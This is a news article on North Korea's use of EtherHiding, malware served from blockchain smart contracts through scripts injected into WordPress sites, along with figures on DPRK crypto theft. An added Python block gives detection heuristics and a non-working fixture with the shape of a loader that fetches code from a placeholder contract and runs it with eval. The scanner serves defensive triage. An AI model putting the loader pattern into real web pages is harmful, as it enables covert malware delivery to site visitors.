
North Korea’s $6 Billion Crypto War: EtherHiding Malware Explained

North Korea has begun using EtherHiding malware embedded in blockchain smart contracts to stealthily steal cryptocurrency, marking a new and resilient phase in its cybercrime operations.


Unstoppable Malware? Inside North Korea’s Use of Blockchain to Spread Cyber Attacks

North Korea’s cybercrime operations are entering a new era, with Google’s Threat Intelligence Group revealing the regime’s adoption of EtherHiding—a novel form of malware that leverages blockchain smart contracts to stealthily distribute malicious code and steal cryptocurrency.

A Nation-State Embraces Blockchain-Based Malware

EtherHiding had previously been used by financially motivated cybercriminals since at least September 2023, but this is the first time a nation-state has been confirmed to weaponize it, according to Google researchers. The North Korean-linked threat actor UNC5342, associated with the notorious FamousChollima hacking group, has integrated EtherHiding into its Contagious Interview social engineering campaign as of February 2025.

Unlike traditional malware campaigns, EtherHiding is remarkably resistant to takedown efforts. Hosted on public blockchains like BNB Smart Chain and Ethereum, the malicious code is embedded directly into smart contracts, making it virtually impossible to remove. “Traditional campaigns have usually been halted by blocking known domains and IPs,” Google noted, “but smart contracts operate autonomously and cannot be shut down.”

How EtherHiding Works

The attack begins on compromised WordPress websites, where a small JavaScript loader is injected. When a user visits the infected site, the script executes in the browser and uses a read-only function call—such as eth_call—to retrieve the malware payload from the blockchain. Because this method doesn’t involve a blockchain transaction, no gas fees are incurred, and the action remains stealthy and undetected.
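The loader shape described above (a read-only eth_call whose hex result is decoded and then executed in the browser) can be hunted for in the scripts served by a site. The following is an added example, not code from the article or from Google's report; its indicator regexes, weights and the two script fixtures are this example's own assumptions, written to illustrate triage of injected WordPress scripts, not to reproduce any real sample.

```python
import re

# Heuristic indicators for an EtherHiding-style loader as described on this
# page: a read-only JSON-RPC eth_call fetches data from a contract, the hex
# result is turned into text, and that text is executed. The regexes below
# are this example's own assumptions, not published indicators.
INDICATORS = {
    "eth_call": re.compile(r"[\"']eth_call[\"']"),
    "text_decode": re.compile(r"fromCharCode|atob\s*\(|TextDecoder"),
    "dynamic_exec": re.compile(
        r"\beval\s*\(|new\s+Function\s*\(|createElement\s*\(\s*['\"]script['\"]\s*\)"),
}


def scan_script(source: str) -> dict:
    """Return the matched indicator names and a verdict for one script body."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(source)}
    if {"eth_call", "dynamic_exec"} <= hits:
        verdict = "suspicious"   # reads from chain, then executes the result
    elif "eth_call" in hits and "text_decode" in hits:
        verdict = "review"       # chain data decoded to text; check what it feeds
    else:
        verdict = "benign"       # eth_call alone is normal for any dapp front end
    return {"hits": sorted(hits), "verdict": verdict}


def scan_html(html: str) -> list:
    """Scan every inline <script> block in a page; one result per block."""
    blocks = re.findall(r"<script[^>]*>(.*?)</script>", html, re.S | re.I)
    return [scan_script(b) for b in blocks]


# Constructed fixtures (not real samples). The first is an ordinary dapp
# balance read; the second has the eth_call -> decode -> execute shape.
DAPP_READ = """
fetch(RPC, {method: "POST", body: JSON.stringify({jsonrpc: "2.0", id: 1,
  method: "eth_call", params: [{to: TOKEN, data: BALANCE_OF + addr}, "latest"]})})
  .then(r => r.json())
  .then(j => { out.textContent = parseInt(j.result, 16) / 1e18; });
"""
LOADER_SHAPE = """
// constructed fixture: rpc() and hexToText() are undefined placeholders
rpc({method: "eth_call", params: [{to: "0xPLACEHOLDER"}, "latest"]}, function (res) {
  eval(hexToText(res.result));
});
"""

if __name__ == "__main__":
    for name, src in [("dapp_read", DAPP_READ), ("loader_shape", LOADER_SHAPE)]:
        print(name, scan_script(src))
```

Run it against the inline scripts of a page you administer; a "suspicious" verdict is a prompt to inspect that block and the theme or plugin files that emit it, not a conviction on its own.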


Once executed on a victim’s computer, the payload can perform a range of malicious actions, from displaying fake login pages to installing infostealers or even deploying ransomware.

A Record-Breaking Year for Crypto Theft

According to blockchain analytics firm Elliptic, North Korean hackers have stolen over $2 billion in 2025 alone, including a staggering $1.46 billion attack on crypto exchange Bybit in February. The DPRK has also been linked to dozens of other attacks targeting platforms like LND.fi, WOO X, and Seedify, bringing its total crypto haul to over $6 billion to date—funds believed to support the country’s nuclear weapons and missile programs.

The regime’s cyber playbook continues to evolve, now including fake companies, social engineering traps, and malicious npm packages. In some cases, North Korean groups are even recruiting non-Koreans to infiltrate tech firms, bypassing increased scrutiny.

The Future of Malware is On-Chain

Google warns that EtherHiding marks a shift in cybercriminal tactics toward “next-generation bulletproof hosting,” utilizing blockchain’s immutability and decentralization for malicious persistence. While tagging smart contracts as malicious offers some visibility, the threat remains active, redefining the cybersecurity challenges facing the crypto ecosystem in 2025.
